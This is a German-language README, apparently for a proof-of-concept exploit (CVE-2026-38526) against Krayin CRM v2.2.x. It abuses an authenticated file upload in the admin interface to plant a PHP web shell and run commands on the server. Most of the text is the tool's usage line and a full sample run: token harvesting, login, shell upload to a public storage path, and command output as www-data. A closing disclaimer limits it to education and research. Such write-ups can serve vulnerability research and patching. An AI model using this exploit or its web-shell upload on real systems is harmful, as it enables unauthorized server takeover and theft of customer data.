
CVE-2026-38526 Exploit | von infrar3d
exploitet von infrar3d
Dies ist ein Proof-of-Concept für Remote Code Execution (RCE), der speziell für Krayin CRM v2.2.x entwickelt wurde, ein Open-Source-Customer-Relationship-Management-System. Das Skript automatisiert die Ausnutzung einer Datei-Upload-Schwachstelle in der administrativen Oberfläche des CRM, um die Remote-Ausführung von Befehlen auf dem Zielserver zu erreichen.
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND
Krayin CRM RCE Exploit
options:
-h, --help show this help message and exit
-rh, --rhost RHOST Remote host
-u, --username USERNAME
Username or E-mail
-p, --password PASSWORD
Password
-c, --command COMMAND
Command to execute
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'
[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
Dieses Skript lädt standardmäßig eine PHP-cmd-Shell von revshells.com hoch.
Nach der Ausnutzung kannst du die Shell in deinem Browser öffnen und von der Webseite aus Befehle senden.
Diese Software und der Proof-of-Concept-Code werden nur für Bildungs- und Forschungszwecke bereitgestellt.
Du bist dafür verantwortlich, alle anwendbaren Gesetze einzuhalten. Nutze es ethisch und verantwortungsbewusst.